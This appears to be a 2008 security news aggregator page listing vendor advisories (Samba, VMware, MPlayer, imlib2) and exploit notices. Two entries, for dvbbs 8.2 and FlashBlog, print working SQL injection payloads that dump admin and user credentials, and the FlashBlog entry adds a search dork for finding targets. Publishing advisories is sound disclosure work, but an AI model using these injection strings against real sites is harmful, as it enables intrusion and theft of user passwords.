[SECURITY] [DSA 1590-1] New samba packages fix arbitrary code execution
( 134 days 4 hours ago)
- Debian Security Advisory DSA-1590-1 securityatdebian.org Florian Weimer May 30, 2008 - Package : samba Vulnerability : buffer overflow Problem type : remote Debian-specific: no CVE Id : CVE-2008-1105 Debian Bug : 483410 Alin Rad Pop discovered that Samba contained a buffer overflow condition ...
VMSA-2008-0008 Updates to VMware Workstation, VMware Player, VMware ACE, VMware Fusion resolve critical security issues
( 134 days 4 hours ago)
VMware Security Advisory Advisory ID: VMSA-2008-0008 Synopsis: Updates to VMware Workstation, VMware Player, VMware ACE, VMware Fusion resolve critical security issues Issue date: 2008-05-30 Updated on: 2008-05-30 (initial release of advisory) CVE numbers: CVE-2008-2098 CVE-2008-2099 - 1. Summary: ...
Debian: New samba packages fix arbitrary code execution
( 134 days 4 hours ago)
LinuxSecurity.com: Alin Rad Pop discovered that Samba contained a buffer overflow condition when processing certain responses received while acting as a client, leading to arbitrary code execution (CVE-2008-1105).
Dot Net Nuke (DNN) <= 4.8.3 XSS Vulnerability
( 134 days 12 hours ago)
www.BugReport.ir # #AmnPardaz Security Research Team # # Title: Dot Net Nuke (DNN) XSS Vulnerability. # Vendor: www.dotnetnuke.com # Vulnerable Version: 4.8.3 and prior versions # Exploit: N/A # Impact: Low # Fix: N/A # Original Advisory: 1. Description: ...
Man charged with using cartoon names to defraud brokerages
( 134 days 16 hours ago)
A California man was arraigned in federal court for allegedly defrauding several brokerage firms in an online scheme.

XEROX DocuShare URL XSS Injection Vulnerabilities
( 134 days 17 hours ago)
XEROX DocuShare URL XSS Injection Vulnerabilities ...
Re: [HV-INFO] Enova hardware encryption: false sense of security
( 134 days 17 hours ago)
Hello, This is Robert Wann and I am representing Enova Technology. I'd like to respond to your published article about the so-called "False Sense of Security" for balanced review. ...
dvbbs8.2(access/sql)version login.asp remote sql injection
( 134 days 17 hours ago)
name: where (topsec security research group) email: hackerbathotmail.com Subject: dvbbs8.2(access/sql)version login.asp remote sql injection danger level: critical/High info: dvbbs is prone to multiple sql injection security flaw interrelated code to access version(exp): password=123123&codestr=71&CookieDate=2&userhidden=2&comeurl=index.asp&submit=%u7ACB%u5373%u767B%u5F55&ajaxPost=1&username=where%2527%2520and%25201%253D%2528select%2520count%2528*%2529%2520from%2520dvadmin%2520where%2520left%2528username%252C1%2529%253D%2527a%2527%2529%2520and%2520%25271%2527%253D%25271 Examples(access version): decide Where’ and ‘1’=’1 where’ and ‘1’=’2 ...
RE: Bypassing URL Authentication and Authorization with HTTP Verb Tampering
( 134 days 17 hours ago)
Interesting (and serendipitous, at that). ISA Server 2004 allows you to configure "allowed / denied methods" in any rule for which the web proxy is involved; effectively nullifying this attack. ...
[ MDVSA-2008:108 ] - Updated samba packages fix arbitrary code execution vulnerability
( 134 days 17 hours ago)
Mandriva Linux Security Advisory MDVSA-2008:108 Package : samba Date : May 28, 2008 Affected: 2007.1, 2008.0, 2008.1, Corporate 3.0, Corporate 4.0 Problem Description: References: Updated Packages: ...
Flash Blog Sql Injection
( 134 days 17 hours ago)
# # Name : FlashBlog sql Injection # Author : Her0 # Dork : "flashblog", allinurl:flashblog.html # Greetz : Komtec1,Freak,Knet,Boer,ka0x # Proof of Concept : [ >>> ] The columns from host to host are different: all resolve =D /php/leercomentarios.php?articuloid=-1/**/union/**/select/**/1,2,3,4,5,concat(email,0x203a3a20,NombreUsuario,0x203a3a20,Password),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22/**/from/**/usuarios/* /php/leercomentarios.php?articuloid=-1/**/union/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31/**/from/**/usuarios/* /php/leercomentarios.php?articuloid=-1/**/union/**/select/**/1,2,3,4,5,concat(email,0x203a3a20,NombreUsuario,0x203a3a20,Password),7,8,9,10,11,12,13,14,15,16,17,18,19/**/from/**/usuarios/* # ...
[ GLSA 200805-22 ] MPlayer: User-assisted execution of arbitrary code
( 134 days 17 hours ago)
Gentoo Linux Security Advisory GLSA 200805-22 - Severity: Normal Title: MPlayer: User-assisted execution of arbitrary code Date: May 29, 2008 Bugs: #215006 ID: 200805-22 - Synopsis An integer overflow vulnerability in MPlayer may allow for the ...
Re: [HV-INFO] Enova hardware encryption: false sense of security
( 134 days 17 hours ago)
Here Enova Technology comments ...
[ GLSA 200805-23 ] Samba: Heap-based buffer overflow
( 134 days 17 hours ago)
Gentoo Linux Security Advisory GLSA 200805-23 - Severity: Normal Title: Samba: Heap-based buffer overflow Date: May 29, 2008 Bugs: #222299 ID: 200805-23 - Synopsis A heap-based buffer overflow vulnerability was found in Samba, allowing ...
FlashBlog Remote File Upload Vulnerability
( 134 days 17 hours ago)
Secunia Research: imlib2 PNM and XPM Buffer Overflow
( 134 days 17 hours ago)
Secunia Research 29/05/2008 - imlib2 PNM and XPM Buffer Overflows - Table of Contents: Affected Software; Severity; Vendor's Description of Software; Description of Vulnerability; Solution; Time Table; Credits; References; About Secunia; Verification. 1) Affected Software * imlib2 1.4.0 NOTE: Other versions may also be affected. ...
Secunia Research: Samba "receive_smb_raw()" Buffer Overflow Vulnerability
( 134 days 17 hours ago)
Secunia Research 28/05/2008 - Samba "receive_smb_raw()" Buffer Overflow Vulnerability - Table of Contents: Affected Software; Severity; Vendor's Description of Software; Description of Vulnerability; Solution; Time Table; Credits; References; About Secunia; Verification. 1) Affected Software * Samba 3.0.28a and 3.0.29. ...
Mandriva: Updated gnome-settings-daemon package fixes various
( 134 days 22 hours ago)
LinuxSecurity.com: Gnome-settings-daemon was not correctly respecting user settings when disabling the background completely. This bug has been fixed, improvements have been made in the time needed to display background when nautilus is used by the system, additional bugfixes and translations have been integrated in this updated package.
Gentoo: Samba Heap-based buffer overflow
( 134 days 22 hours ago)
LinuxSecurity.com: A heap-based buffer overflow vulnerability was found in Samba, allowing for the execution of arbitrary code.
Gentoo: MPlayer User-assisted execution of arbitrary
( 134 days 22 hours ago)
LinuxSecurity.com: An integer overflow vulnerability in MPlayer may allow for the execution of arbitrary code.






